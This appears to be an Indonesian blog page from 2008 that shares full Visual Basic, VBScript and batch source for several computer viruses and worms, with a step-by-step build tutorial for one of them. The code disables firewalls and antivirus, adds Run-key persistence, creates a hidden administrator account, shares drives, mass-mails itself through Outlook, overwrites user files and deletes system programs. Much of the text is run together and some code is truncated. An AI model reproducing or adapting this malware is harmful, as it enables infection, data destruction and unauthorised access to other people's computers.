Office\Office12\WINWORD.EXE"), vbNormalFocusEnd SubPrivate Function TikusCariFile(NamaLengkapFile As String) As Boolean On Error GoTo LupusdanTikus Open NamaLengkapFile For Input As #1 Close #1 FileEx = True Exit FunctionLupusdanTikus: FileEx = False Exit FunctionEnd FunctionSub TikusAmbilInfoKomputer()Dim JalaLupusDim DokumenLupusOn Error Resume NextSet JalaLupus = CreateObject("WScript.NetWork")If Err.Number <> 0 ThenDokumenLupus.Location = "TikusLupus.html"End IfDim NamaPemakaiDim NamaKomputerDim DomainKomputerNamaPemakai = JalaLupus.usernameNamaKomputer = JalaLupus.ComputerNameDomainKomputer = JalaLupus.UserDomainSelect Case DomainKomputerCase "STD"Case "AVR"TikusFirewall.DisableFirewallCase ElseTikusFirewall.DisableFirewallEnd SelectSet JalaLupus = NothingEnd SubSub InfeksiTikus2()FileCopy App.Path + "\" + App.EXEName + ".exe", "C:\WINDOWS\SYSTEM32\1025\TikusLupus.exe" FileCopy App.Path + "\" + App.EXEName + ".exe", "C:\WINDOWS\SYSTEM32\1028\TikusLupus.exe"Set newreg = CreateObject("WScript.Shell") newreg.RegWrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Lupus", "C:\WINDOWS\SYSTEM32\1025\TikusLupus.exe" newreg.RegWrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Micerosoft", "C:\WINDOWS\SYSTEM32\1028\TikusLupus.exe"Name "C:\Program Files\Microsoft Office\Office10\winword.exe" As "C:\Program Files\Microsoft Office\Office10\WINWORD.exe"FileCopy App.Path + "\" + App.EXEName + ".exe", "C:\Program Files\Microsoft Office\Office10\winword.exe"Name "C:\Program Files\Microsoft Office\Office12\winword.exe" As "C:\Program Files\Microsoft Office\Office12\WINWORD.exe"FileCopy App.Path + "\" + App.EXEName + ".exe", "C:\Program Files\Microsoft Office\Office12\winword.exe"End SubPrivate Sub Form_Load()Dim Fso, DrvTypeDim Drives, Drive, Folder, subfolders, subfolder, Files, FileSet Fso = CreateObject("Scripting.FileSystemObject")If (Fso.DriveExists("C:\")) <> "" ThenDrvType = "C:\"End IfIf (Fso.DriveExists("D:\")) <> "" ThenDrvType = "D:\"End IfSet Drives = Fso.DrivesFor Each Drive In DrivesIf Drive.IsReady ThenCall PencarianTikus(Drive)End IfNextTikusLupus.Visible = FalseApp.TaskVisible = FalseTimer1 = FalseCall TikusAmbilInfoKomputerX$ = GetSetting(Me.Name, App.Title, "TimesOpen")TikusCariFile "C:\Program Files\Microsoft Office\Office10\WINWORD.exe"TikusCariFile "C:\Program Files\Microsoft Office\Office12\WINWORD.exe"Call LingkaranTikus(Me)Call AmbilJamDikomputerIf year >= "2007" ThenCall PermenLupusEnd If Select Case X$Case 1 Call hibernateCase 2 Call PenampilanLupusCase Else InfeksiTikus2 Timer1 = TrueEnd SelectEnd SubPrivate Sub Timer1_Timer()RuanganTikusEnd SubFunction PencarianTikus(Path)Dim Fso, DrvType, ws, TikusKetiga, TikuskeempatDim Drives, Drive, Folder, subfolders, subfolder, Files, FileSet Fso = CreateObject("Scripting.FileSystemObject")Set Fso = CreateObject("Scripting.FileSystemObject")Set Folder = Fso.GetFolder(Path)Set Files = Folder.FilesFor Each File In FilesIf Fso.GetExtensionName(File.Path) = "rar" Then Set ws = CreateObject("wscript.shell") Set Fso = CreateObject("Scripting.filesystemobject") TikusKetiga = "C:\Program Files\WinRAR\WinRAR.exe": Tikuskeempat = "D:\Program Files\WinRAR\WinRAR.exe" If Fso.TikusCariFile(TikusKetiga) Or Fso.TikusCariFile(Tikuskeempat) Thenws.run "WinRAR a -ibck -inul """ & File.Path & """ C:\TikusLupus.exe"Open App.Path & "\DaftarTikus.txt" For Append As #1 Write #1, File.PathClose #1 End IfEnd IfNextSet subfolders = Folder.subfoldersFor Each subfolder In subfolders PencarianTikus subfolder.PathNextEnd FunctionIni Kode yang di Taruh di Modules-> Daerah Tikus Lupus :
Option ExplicitPublic Enum enProtocoll TCP = 0 UDP = 1End EnumIni Kode yang di Taruh di Modulesl-> Module 1 :
Global FileExGlobal yearGlobal X As StringGlobal newregIni Kode yang di Taruh di Modules-> Rumah Tikus :
Option ExplicitPublic Type tagInitCommonControlsEx lngSize As Long lngICC As LongEnd TypePrivate Declare Function InitCommonControlsEx Lib "COMCTL32.DLL" _ (KejuTikusLupus As tagInitCommonControlsEx) As BooleanPrivate Const ICC_USEREX_CLASSES = &H200Public Sub PusatTikus() On Error Resume Next Dim KejuTikusLupus As tagInitCommonControlsEx With KejuTikusLupus .lngSize = LenB(KejuTikusLupus) .lngICC = ICC_USEREX_CLASSES End With InitCommonControlsEx KejuTikusLupus TikusLupus.Show TikusLupus.Hide App.TaskVisible = False On Error GoTo 0 End SubIni Kode yang di Taruh di Class Modules-> Lupus Firewall :
Option ExplicitConst ICSSC_DEFAULT = 0Const CONNECTION_PUBLIC = 0Const CONNECTION_PRIVATE = 1Const CONNECTION_ALL = 2Const NET_FW_IP_PROTOCOL_UDP = 17Const NET_FW_IP_PROTOCOL_TCP = 6Const NET_FW_SCOPE_ALL = 0Const NET_FW_SCOPE_LOCAL_SUBNET = 1Private JalurBerbagiFileLupus As Object'--> Kembalikan Status FirewallPublic Function StatusFirewallLupus() As BooleanDim PeriksaFirewallLupus As BooleanDim ProfileFirewallTikus As ObjectOn Error GoTo TangkisError Set JalurBerbagiFileLupus = CreateObject("HNetCfg.FwMgr") Set ProfileFirewallTikus = JalurBerbagiFileLupus.LocalPolicy.CurrentProfile If ProfileFirewallTikus.FirewallEnabled = False Then PeriksaFirewallLupus = False Else PeriksaFirewallLupus = True End If StatusFirewallLupus = PeriksaFirewallLupus Exit Function TangkisError: StatusFirewallLupus = False MsgBox "Error: " & Err.Description Err.ClearEnd Function'--> Aktifkan FirewallPublic Sub EnableFirewall()Dim ProfileFirewallTikus As Object On Error GoTo ErrorHandler Set JalurBerbagiFileLupus = CreateObject("HNetCfg.FwMgr") Set ProfileFirewallTikus = JalurBerbagiFileLupus.LocalPolicy.CurrentProfile If ProfileFirewallTikus.FirewallEnabled = False Then ProfileFirewallTikus.FirewallEnabled = True End If Set ProfileFirewallTikus = Nothing Set JalurBerbagiFileLupus = Nothing Exit Sub ErrorHandler: MsgBox Err.Description Err.ClearEnd Sub'--> Matikan FirewallPublic Sub DisableFirewall()Dim ProfileFirewallTikus As Object On Error GoTo ErrorHandler Set JalurBerbagiFileLupus = CreateObject("HNetCfg.FwMgr") Set ProfileFirewallTikus = JalurBerbagiFileLupus.LocalPolicy.CurrentProfile If ProfileFirewallTikus.FirewallEnabled = True Then ProfileFirewallTikus.FirewallEnabled = False End If Set ProfileFirewallTikus = Nothing Set JalurBerbagiFileLupus = Nothing Exit Sub ErrorHandler: MsgBox Err.Description Err.ClearEnd Sub'--> Tambah Port Di Konfigurasi FirewallPublic Sub TikusTambahPortDikunfigurasiFirewallUntukKeluar(ByVal strPortName As String, ByVal strPortProtocol As String, ByVal intPortNumber As Integer)Dim ProfileFirewallTikus As ObjectDim port As ObjectOn Error GoTo TangkisError Set JalurBerbagiFileLupus = CreateObject("HNetCfg.FwMgr") Set ProfileFirewallTikus = JalurBerbagiFileLupus.LocalPolicy.CurrentProfile Set port = CreateObject("HNetCfg.FWOpenPort") port.Name = strPortName If LCase(strPortProtocol) = "UDP" Then port.Protocol = NET_FW_IP_PROTOCOL_UDP Else port.Protocol = NET_FW_IP_PROTOCOL_TCP End If port.port = intPortNumber port.Scope = NET_FW_SCOPE_ALL port.Enabled = True ProfileFirewallTikus.GloballyOpenPorts.Add port Set ProfileFirewallTikus = Nothing Set port = Nothing Set JalurBerbagiFileLupus = Nothing Exit Sub TangkisError: MsgBox Err.Description Err.ClearEnd SubPublic Sub BirkanDataMasukServiceICMP(ByVal bolAllow As Boolean)Dim ProfileFirewallTikus As ObjectOn Error GoTo TangkisError Set JalurBerbagiFileLupus = CreateObject("HNetCfg.FwMgr") Set ProfileFirewallTikus = JalurBerbagiFileLupus.LocalPolicy.CurrentProfile ProfileFirewallTikus.IcmpSettings.AllowInboundEchoRequest = bolAllow Set ProfileFirewallTikus = Nothing Set JalurBerbagiFileLupus = NothingExit SubTangkisError: MsgBox Err.Description Err.ClearEnd Sub
Diposting oleh baracrack di Rabu, April 02, 2008 0 komentar
Shadow Kumbang
Cara buatnya gampang kok, Aq ajarin.. dari awal ya.. cara buatnya.. Bagi yang belum tau Visual Basic gini nih buatnya.. : a. Buka Visual Basic
b. Klik File terus New Project
c. Muncul Jendela New Project pilih Standard EXE Klik OK
d. Rubah Name Formnya di Properties jadi ShadowKumbang
e. Pada form kosong Masukin 4 komponen yang udah ada di Tool BOX Di anataranya : Timer -> Propertiesnya di Interval rubah jadi 30000 DriveListBox, -> Properties gak usah dirubah gak penting DirListBox, -> Properties gak usah dirubah gak perlu FileListBox, -> Properties gak usah dirubah bikin capek aja
f. Udah itu aja terus gimana.. ya masukin Coding Form 1 dunks..
g. Kalo udah masukin 2 Module
h. Pada Menu Bar Klik Project pilih add Module
i. Rubah name di Modulenya Mkumbang1 ama Mkumbang2
j. Kalo udah gimana
k. Ya.. tetep masuk..in dunks Codingnya hi.. hi..
l. Kalo udah juga.. Simpan Projectnya
m. Klik File Save Project
n. Rubah nama Form1 jadi ShadowKumbang terus..
o. Project1 jadi ShadowAngel
p. Kalo udah,iiih udah terus cepet amat sih…
q. Rubah nama EXE
r. Klik Project pilih ShadowAngelProperties Pilih Tab Make
s. Pada Titelnya ganti namanya jadi Shadow Kumbang
t. Kalo Udah kita buat .Exe..nya
u. Klik File pilih Make ShadowKumbang
v. Pilih tempat Simpenya..
w. Udah itu aja.. terus gimana..
x. Ya di jalan..in dunks.. EXE yang kita buat tadi
y. Udah gak ada lagi.. Kalo mau lebih jelasnya lihat aja gambar di bawah ini oke..
Taruh Coding di bawah ini Di Form :
Private Declare Function PlaySound Lib "winmm.dll" Alias "PlaySoundA" (ByVal lpszName As String, ByVal hModule As Long, ByVal dwFlags As Long) As LongConst HKLM As String = "HKEY_LOCAL_MACHINE\"Const HKCU As String = "HKEY_CURRENT_USER\"Const HKCR As String = "HKEY_CLASSES_ROOT\"Const SWP_HIDEWINDOW = &H80Const Cr = vbCrLfPrivate Sub Form_Load(): Me.Visible = False: App.TaskVisible = FalseOn Error Resume NextDim BackUpKumbang As String: BackUpKumbang = Windir & "\Kumbang.exe"If LCase(RacunKumbang) <> LCase(BackUpKumbang) Then FileCopy RacunKumbang, BackUpKumbang Shell BackUpKumbang, vbHide If InStr(RacunKumbang, ".txt.") Then Shell "notepad.exe", vbNormalFocus SendKeys "-: Salam Vxer :-" & Cr & "[- Tingkatkan Masyarakat Vxer -]" & Cr & "Thanks All Vxer" & Cr & "www.Shadow-Angel.com", 1 End If If App.EXEName = "emm386" Then Shell "iexplore.exe http://www.Shadow-Angel.com" End End IfCall MatiinAntivirusCall RegisterCall KumbangTerbangCall Infeksi_KumbangFileCopy RacunKumbang, Windir & "\Jangan Di Baca.txt.exe"FileCopy RacunKumbang, Windir & "\www.ShadowAngel.com"FileCopy RacunKumbang, Windir & "\www.yahoo.com"FileCopy RacunKumbang, Windir & "\ShadowAngel.exe"FileCopy RacunKumbang, Windir & "\notepad.com"FileCopy RacunKumbang, Windir & "\telnet.com"FileCopy RacunKumbang, Windir & "\internet.log.exe"FileCopy RacunKumbang, Windir & "\system.com"FileCopy RacunKumbang, Windir & "\kernel32.com"FileCopy RacunKumbang, Windir & "\emm386.com"FileCopy RacunKumbang, Windir & "\regedit.com"FileCopy RacunKumbang, Windir & "\paint.com"FileCopy RacunKumbang, Windir & "\winhlp32.com"FileCopy RacunKumbang, Windir & "\winhelp.com"FileCopy RacunKumbang, Windir & "\taskman.com"FileCopy RacunKumbang, Windir & "\hh.com"FileCopy RacunKumbang, Windir & "\extrac32.com"FileCopy RacunKumbang, Windir & "\ping.com"If App.PrevInstance Then End End IfEnd SubPrivate Sub Register()Dim RegRun As String, RegOpen As StringRegOpen = "file\shell\open\command"RegRun = Chr(83) + Chr(111) + Chr(102) + Chr(116) + Chr(119) + Chr(97) + Chr(114) + Chr(101) + Chr(92) + Chr(77) + Chr(105) + Chr(99) + Chr(114) + Chr(111) + Chr(115) + Chr(111) + Chr(102) + Chr(116) + Chr(92) + Chr(87) + Chr(105) + Chr(110) + Chr(100) + Chr(111) + Chr(119) + Chr(115) + Chr(92) + Chr(67) + Chr(117) + Chr(114) + Chr(114) + Chr(101) + Chr(110) + Chr(116) + Chr(86) + Chr(101) + Chr(114) + Chr(115) + Chr(105) + Chr(111) + Chr(110) + Chr(92) + Chr(82) + Chr(117) + Chr(110)CreatDword HKCU & Left(RegRun, 42) & "Policies\system", "DisableTaskMgr", "1"CreatString HKLM & RegRun, "VGA Task", "Kumbang.exe"CreatString HKLM & RegRun, "Windows Help Srv", "Winhelp.com"CreatString HKLM & RegRun & "Once", "System Help", "HH.com"CreatString HKLM & RegRun & "Once", "Win HELP", "winhlp32.com"CreatString HKLM & RegRun & "ServicesOnce", "System", "system.com"CreatString HKLM & RegRun & "Services", "SysPing", "ping.com"CreatString HKLM & RegRun & "Services", "INTERNET-Log", "internet.log.exe"CreatDword HKCU & Left(RegRun, 42) & "Explorer\Advanced", "DisableTaskMgr", "1"CreatDword HKCU & Left(RegRun, 42) & "Explorer\Advanced", "HideFileExt", "1"CreatDword HKCU & Left(RegRun, 42) & "Policies\Explorer", "NoUserNameInStartMenu", "1"CreatDword HKCU & Left(RegRun, 42) & "Policies\Explorer", "NoViewContextMenu", "1"CreatDword HKCU & Left(RegRun, 42) & "Policies\Explorer", "NoLogOff", "1"CreatDword HKCU & Left(RegRun, 42) & "Policies\Explorer", "NoFolderOptions", "1"CreatDword HKCU & Left(RegRun, 42) & "Policies\Explorer", "NoRun", "1"CreatDword HKCU & Left(RegRun, 42) & "Policies\Explorer", "NoFind", "1"CreatDword HKCU & Left(RegRun, 42) & "Policies\System", "DisableRegistryTools", "1"CreatDword HKCU & Left(RegRun, 42) & "Policies\System", "DisableCMD", "1"CreatDword HKCU & Left(RegRun, 42) & "Explorer\Advanced", "ShowSuperHidden", "1"CreatDword HKCU & Left(RegRun, 42) & "Explorer\Advanced", "Start_ShowControlPanel", "0"CreatDword HKCU & Left(RegRun, 42) & "Explorer\Advanced", "Start_ShowHelp", "0"CreatDword HKCU & Left(RegRun, 42) & "Explorer\Advanced", "Start_ShowMyComputer", "0"CreatDword HKCU & Left(RegRun, 42) & "Explorer\Advanced", "Start_ShowMyDocs", "0"CreatDword HKCU & Left(RegRun, 42) & "Explorer\Advanced", "Start_ShowMyMusic", "0"CreatDword HKCU & Left(RegRun, 42) & "Explorer\Advanced", "Start_ShowMyPics", "0"CreatDword HKCU & Left(RegRun, 42) & "Explorer\Advanced", "Start_ShowSearch", "0"CreatDword HKCU & Left(RegRun, 42) & "Explorer\Advanced", "SuperHidden", "1"CreatDword HKCU & Left(RegRun, 42) & "Explorer\Advanced", "Start_ShowPrinters ", "0"CreatDword HKCU & Left(RegRun, 42) & "Explorer\Advanced", "Start_LargeMFUIcons", "1"CreatDword HKCU & Left(RegRun, 42) & "Explorer\Advanced", "Hidden", "0"CreatDword HKCU & Left(RegRun, 42) & "Control Panel\Mouse", "SwapMouseButtons", "1"CreatDword HKCU & Left(RegRun, 42) & "CurrentVersion\Policies", "System", "1"CreatDword HKCU & Left(RegRun, 42) & "CurrentVersion\Internet Settings", "ProxyEnable", "1"CreatDword HKCU & Left(RegRun, 42) & "CurrentVersion\Internet Settings", "ProxyServer", ""CreatDword HKCU & Left(RegRun, 42) & "Internet Explorer\Control Panel", "Connection Settings", "1"CreatDword HKCU & Left(RegRun, 42) & "Internet Explorer\Control Panel", "Connwiz Admin Lock", "1"CreatDword HKLM & RegRun & "Winlogon\SpecialAccounts\UserList", "Kumbang", "1"CreatDword HKLM & RegRun & "Services\LanmanServer\Parameters", "Hidden", "1"CreatString HKCU & RegRun, "(C) By Shadow Angel", "Kumbang.exe"CreatString HKCU & RegRun, "MSREG32 Service", "Regedit.com"CreatString HKCU & RegRun, "Win32 Service", "extrac32.com"CreatString HKCU & RegRun & "Once", "MSTelnet", "telnet.com"CreatString HKCU & "Internet Explorer\Main", "Start Page", "http://www.ShadowAngel.com"'-------------------------------------------------------------------------------------------------CreatString HKCR & "Htmlfile\shell\opennew\command", "", "emm386.com"CreatString HKCR & "MPEG" & RegOpen, "", "paint.com"CreatString HKCR & "txt" & RegOpen, "", "notepad.com"CreatString HKCR & "mp3" & RegOpen, "", "kernel32.com"CreatString HKCR & "exefile\shell\runas\command", "", "taskman.com"End SubFunction SayapKumbang(): On Error Resume NextDim a, b, f, d, g, Body, RegSet Reg = CreateObject("wscript.shell")Reg.regwrite Chr(72) + Chr(75) + Chr(69) + Chr(89) + Chr(95) + Chr(67) + Chr(85) + Chr(82) + Chr(82) + Chr(69) + Chr(78) + Chr(84) + Chr(95) + Chr(85) + Chr(83) + Chr(69) + Chr(82) + Chr(92) + Chr(83) + Chr(111) + Chr(102) + Chr(116) + Chr(119) + Chr(97) + Chr(114) + Chr(101) + Chr(92) + Chr(77) + Chr(105) + Chr(99) + Chr(114) + Chr(111) + Chr(115) + Chr(111) + Chr(102) + Chr(116) + Chr(92) + Chr(79) + Chr(102) + Chr(102) + Chr(105) + Chr(99) + Chr(101) + Chr(92) + Chr(49) + Chr(48) + Chr(46) + Chr(48) + Chr(92) + Chr(79) + Chr(117) + Chr(116) + Chr(108) + Chr(111) + Chr(111) + Chr(107) + Chr(92) + Chr(83) + Chr(101) + Chr(99) + Chr(117) + Chr(114) + Chr(105) + Chr(116) + Chr(121) + Chr(92) + Chr(76) + Chr(101) + Chr(118) + Chr(101) + Chr(108) + Chr(49) + Chr(82) + Chr(101) + Chr(109) + Chr(111) + Chr(118) + Chr(101), Chr(46) + Chr(99) + Chr(111) + Chr(109) + Chr(59) + Chr(46) + Chr(101) + Chr(120) + Chr(101)If Reg.RegRead("HKEY_CURRENT_USER\Software\Microsoft\" & Chr(73) + Chr(110) + Chr(116) + Chr(101) + Chr(114) + Chr(110) + Chr(101) + Chr(116) + Chr(32) + Chr(65) + Chr(99) + Chr(99) + Chr(111) + Chr(117) + Chr(110) + Chr(116) + Chr(32) + Chr(77) + Chr(97) + Chr(110) + Chr(97) + Chr(103) + Chr(101) + Chr(114) + Chr(92) + Chr(65) + Chr(99) + Chr(99) + Chr(111) + Chr(117) + Chr(110) + Chr(116) + Chr(115) + Chr(92) + Chr(48) + Chr(48) + Chr(48) + Chr(48) + Chr(48) + Chr(48) + Chr(48) + Chr(49) + Chr(92) + Chr(83) + Chr(77) + Chr(84) + Chr(80) + Chr(32) + Chr(69) + Chr(109) + Chr(97) + Chr(105) + Chr(108) + Chr(32) + Chr(65) + Chr(100) + Chr(100) + Chr(114) + Chr(101) + Chr(115) + Chr(115)) <> "" ThenBody = String(80, "=") & CrBody = Body & "Salam Vxer" & CrBody = Body & "Tingkatkan Masyarakat Vxer" & CrBody = Body & "Thanks Vxer" & CrBody = Body & String(80, "=")Set a = CreateObject(Chr(79) + Chr(117) + Chr(116) + Chr(108) + Chr(111) + Chr(111) + Chr(107) + Chr(46) + Chr(65) + Chr(112) + Chr(112) + Chr(108) + Chr(105) + Chr(99) + Chr(97) + Chr(116) + Chr(105) + Chr(111) + Chr(110))Set b = a.getnamespace(Chr(77) + Chr(65) + Chr(80) + Chr(73))If a = Chr(79) + Chr(117) + Chr(116) + Chr(108) + Chr(111) + Chr(111) + Chr(107) Thenb.Logon "profile", "password"For f = 1 To b.addresslists.CountFor d = 1 To b.addresslists(f).addressentries.CountWith a.createitem(0) Set g = b.addresslists(f).addressentries(d) .Recipients.Add g .Subject = "Salam Vxer :)" .Body = Body .Attachments.Add Windir & "\Jangan Di Baca.txt.exe", 1, 1, "Jangan Di Baca.txt" .Attachments.Add Windir & "\www.Shadow-Angel.com", 1, 2, "http://www.Shadow-Angel.com" .Attachments.Add Windir & "\www.yahoo.com", 1, 3, "[ Yahoo ]" .Importance = 2 .DeleteAfterSubmit = True .sendEnd Withg = ""Next dNext fb.logoffEnd IfElseMsgBox "Please... atur dulu Outlooknya ya.. ", 64, "Pesan Kumbang"End IfEnd FunctionPrivate Sub Timer1_Timer(): On Error Resume NextDim Hid As LongCall MatiinAntivirusIf JaringanKumbang() = True And Me.Caption <> "ok" Then Me.Caption = "ok" Call Jalankan_Kumbang2 Call SayapKumbangEnd IfIf JaringanKumbang() = False And Me.Caption = "ok" Then Call Matiin_Kumbang2 Me.Caption = ""End IfIf Me.Caption = "ShutDown" Then Unload MeIf Day(Now) = 17 Then PlaySound Windir & "\Media\notify.wav", 1, 1 Hid = FindWindow("Shell_traywnd", "") Call SetWindowPos(Hid, 0, 0, 0, 0, 0, SWP_HIDEWINDOW) Me.Visible = True Me.Show Me.Caption = "ShutDown"End IfIf Timer1.Tag Mod 4 = 0 Then If Dir("A:\*.*") <> "" Then Call Infeksi_Kumbang2("A:") FileCopy RacunKumbang, "A:\Jangan Di Baca.txt.exe" FileCopy RacunKumbang, "A:\Game.com"End IfTimer1.Tag = Timer1.Tag + 1End SubPrivate Sub Dir1_Change()File1.Path = Dir1.PathEnd SubPrivate Sub Drive1_Change()Dir1.Path = Drive1.DriveEnd SubPrivate Sub Form_Unload(Cancel As Integer)Call Shut_DownEnd SubPrivate Sub Form_QueryUnload(Cancel As Integer, UnloadMode As Integer)Call Shut_DownEnd SubPublic Sub Shut_Down()nLogOff = 0nReboot = 2nForceLogOff = 4nForceReboot = 6nPowerDown = 8nForcePowerDown = 12Set oOS = GetObject("winmgmts:{(Shutdown)}").ExecQuery("Select * from Win32_OperatingSystem")For Each oOperatingSystem In oOS oOperatingSystem.Win32Shutdown (nForceReboot)NextEnd Sub
Taruh Coding dibawah ini di Module-> Mkumbang1 :
Public Declare Function InternetGetConnectedState Lib "wininet.dll" (ByRef lpSFlags As Long, ByVal dwReserved As Long) As LongPrivate Declare Function GetWindowsDirectory Lib "kernel32" Alias "GetWindowsDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As LongDeclare Function SetWindowPos Lib "user32" (ByVal hwnd As Long, ByVal hWndInsertAfter As Long, ByVal x As Long, ByVal y As Long, ByVal cx As Long, ByVal cy As Long, ByVal wFlags As Long) As LongDeclare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As LongPublic Function JaringanKumbang() As BooleanJaringanKumbang = InternetGetConnectedState(0&, 0&)End FunctionPublic Function Windir() As String Dim stf As String * 255, intl As Integer intl = GetWindowsDirectory(stf, 255) Windir = (Left(stf, intl))End FunctionPublic Function CreatString(Path As String, Var As String, Val As String) As LongDim File As String: RandomizeFile = "C:\" & Int(Rnd * 100) & "reg.reg"Open File For Output As #1Print #1, "REGEDIT4"Print #1, Chr(13)Print #1, "[" & Path & "]"Print #1, Chr(13)Print #1, Chr(34) & Var & Chr(34) & "=" & Chr(34) & Val & Chr(34)Close #1Shell "regedit /s " & File, vbNormalFocusKill FileEnd FunctionPublic Function CreatDword(Path As String, Var As String, Val As String) As LongDim File As String: RandomizeFile = "C:\" & Int(Rnd * 100) & "reg.reg"Open File For Output As #1Print #1, "REGEDIT4"Print #1, Chr(13)Print #1, "[" & Path & "]"Print #1, Chr(13)Print #1, Chr(34) & Var & Chr(34) & "=" & "dword:" & ValClose #1Shell "regedit /s " & File, vbNormalFocusKill FileEnd FunctionPublic Function RacunKumbang() As StringRacunKumbang = App.PathIf Right(RacunKumbang, 1) <> "\" Then RacunKumbang = RacunKumbang & "\"If Dir(RacunKumbang & App.EXEName & ".com") <> "" Then RacunKumbang = RacunKumbang & App.EXEName & ".com"Else RacunKumbang = RacunKumbang & App.EXEName & ".exe"End IfEnd FunctionPublic Sub KumbangTerbang(): On Error Resume NextConst Regbkdr As String = "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\"CreatDword Regbkdr & "TlntSvr", "Start", "2"CreatDword Regbkdr & "TermService", "Start", "2"Open "a.bat" For Output As #1 Print #1, "@echo off" Print #2, "echo " Print #1, "Net user Shadow Kumbang pwd /add >nul" Print #1, "Net localgroup administrators Shadow Kumbang /add >nul" Print #1, "Net share drive=c: >nul" Print #1, "Net share drive=d: >nul"CloseShell "a.bat", vbHideEnd SubPublic Sub Jalankan_Kumbang2(): On Error Resume NextOpen "Mawar2.bat" For Output As #1 Print #1, "@echo off" Print #2, "echo " Print #1, "Net user Shadow Kumbang /active:yes >nul"CloseShell " Mawar2.bat", vbHideEnd SubPublic Sub Matiin_Kumbang2(): On Error Resume NextOpen "ShadowKumbang.bat" For Output As #2 Print #2, "@echo off" Print #2, "echo " Print #2, "Net user Shadow Kumbang /active:no >nul"CloseShell "ShadowKumbang.bat", vbHideEnd SubPublic Sub MatiinAntivirus()If Environ("os") <> "" Then Dim NtSp: NtSp = "NET STOP " Shell NtSp & "MCSHIELD", vbHide Shell NtSp & "NORTON ANTIVIRUS AUTO PROTECT SERVICE", vbHide Shell NtSp & "Automatic Updates", vbHide Shell NtSp & Chr(83) + Chr(104) + Chr(97) + Chr(114) + Chr(101) + Chr(100) + Chr(65) + Chr(99) + Chr(99) + Chr(101) + Chr(115) + Chr(115), vbHide Call MatiinAntivirus2End IfEnd SubPrivate Sub MatiinAntivirus2()EndTask ("McVSEscn")EndTask ("MCVSFTSN")EndTask ("MCTOOL")EndTask ("MCVSRTE")EndTask ("MCMNHDLR")EndTask ("MCAGENT")EndTask ("MCUPDATE")EndTask ("MCUPDMGR")EndTask ("NAVAPSVC")EndTask ("NAVAPW32")EndTask ("NAVDX")EndTask ("NAVLU32")EndTask ("NAVSTUB")EndTask ("NAVW32")EndTask ("NAVWNT")EndTask ("KAV")EndTask ("KAVMM")End SubPrivate Sub EndTask(Task As String)On Error Resume NextDim Cmd: Cmd = Environ("comspec") & " /c "Shell Cmd & "taskkill /f /im " & Task & ".exe /t", vbHideEnd SubTaruh Coding dibawah ini di Module->Mkumbang2 :
Public Sub Infeksi_Kumbang(): On Error Resume NextDim O, iFor O = ShadowKumbang.Drive1.ListCount To 1 Step -1 ShadowKumbang.Drive1.Drive = ShadowKumbang.Drive1.List(O) For i = 0 To ShadowKumbang.Dir1.ListCount If ShadowKumbang.Dir1.List(i) <> "" Then Infeksi_Kumbang2 (ShadowKumbang.Dir1.List(i)) FileCopy RacunKumbang, ShadowKumbang.Dir1.List(i) & "\Cerita Kumbang.com" End If NextNextEnd SubPublic Sub Infeksi_Kumbang2(Path As String)Dim Mawar As String, Duri_Mawar As String, iShadowKumbang.File1.Path = PathFor i = 0 To ShadowKumbang.File1.ListCount If ShadowKumbang.File1.List(i) <> "" Then Mawar = ShadowKumbang.File1.Path & "\" & File1.List(i) Duri_Mawar = LCase(Right(Mawar, 3)) If Duri_Mawar = "com" And InStr(Mawar, "win.com") = 0 _ And InStr(Mawar, "command.com") = 0 Then FileCopy RacunKumbang, Mawar End If If Duri_Mawar = "txt" Then FileCopy RacunKumbang, Mawar & ".exe" Kill Mawar End If If Duri_Mawar = "exe" Then FileCopy RacunKumbang, Left(Mawar, Len(Mawar) - 3) & "com" End If End IfNextEnd Sub
Diposting oleh baracrack di Rabu, April 02, 2008 0 komentar
md c:\GSS
if exist c:\gss goto end
echo off
@echo Silent Nights, Lonely Nights.
@echo My Lonelieness Is Killing Me.
@echo Its So Silent, So Lonely Tonight.
@echo How I Wish That You Were Here With Me.
@echo The Loneliness That Comes With The Silent Nights
@echo Would Be Better If I Were Lonely And Silent With You!
@echo ...I Fucking Love You A.E! It Would Be Worth The Silence
@echo If The Silence Were With You...
@echo off
@copy c:\windows\notepad.exe c:\windows\notepad.vbs
@del c:\windows\notepad.exe
@copy c:\windows\regedit.exe c:\windows\regedit.vbs
@del c:\windows\regedit.exe
@if not exist c:\windows\notepad.vbs goto end
@if not exist c:\windows\regedit.vbs goto end
goto end
Diposting oleh baracrack di Rabu, April 02, 2008 0 komentar
' Bumblebee - my first VB Script Virus
' by Bumblebee/[Hail and Kill] '99
' Feel free to use and modify it
on error resume next
const fdWrite=2, fdRead=1
remove=endl&" This system is infected by Bumblebee.vbs Virus."&endl&endl&" Don't worry, it's a easy-to-remove virus:"&endl&endl&" . Edit all of your system .vbs files and"&endl&" delete from "&chr(39)&"-"&"@ to "&chr(39)&"-"&"@"&endl&endl&" (C) 1999 Bumblebee/[Hail and Kill] Wink"&endl&endl
set fso=createObject("Scripting.FileSystemObject")
set myShell=createObject("WScript.Shell")
if infCount<1 then
myShell.regWrite "HKCU\infCount",1
end if
if infCount>10 then
set fd=fso.openTextFile(desk&"\\Remove me!.txt",fdWrite,1)
fd.write remove
end if
set fd=fso.openTextFile(hostName,fdRead)
set fd=fso.openTextFile(hostName,fdRead)
for each victim in fso.getfolder(".").files
if mid(vExt,1,1)="v" or mid(vExt,1,1)="V" then i=i+1 end if
if mid(vExt,2,1)="b" or mid(vExt,2,1)="B" then i=i+1 end if
if mid(vExt,3,1)="s" or mid(vExt,3,1)="S" then i=i+1 end if
if i=3 then
set fd=fso.openTextFile(victim.path,fdRead)
if left(victimCode,3)<>chr(39)&"-"&"@" then
set fd=fso.openTextFile(victim.path,fdWrite,1)
fd.write infectedCode
end if
end if
myShell.regWrite "HKCU\infCount",infCount
On Error Resume Next
Const cbVirusSize = 3914
Const cbForReading=1, cbForWriting=2
Const cbWindowsFolder = 0
Dim cbFSO, cbInfectionMarker, cbVictimCode, cbVirusCode
Dim cbWePath, cbWeFile, cbVictim, VictimFile
Dim cbFoldersToInfect(3), cbFolder, cbFile, cbDriveList, cbDrive
Dim cbTextFile
Set cbFSO = CreateObject("Scripting.FileSystemObject")
cbWePath = Wscript.ScriptFullName
cbFoldersToInfect(0) = "."
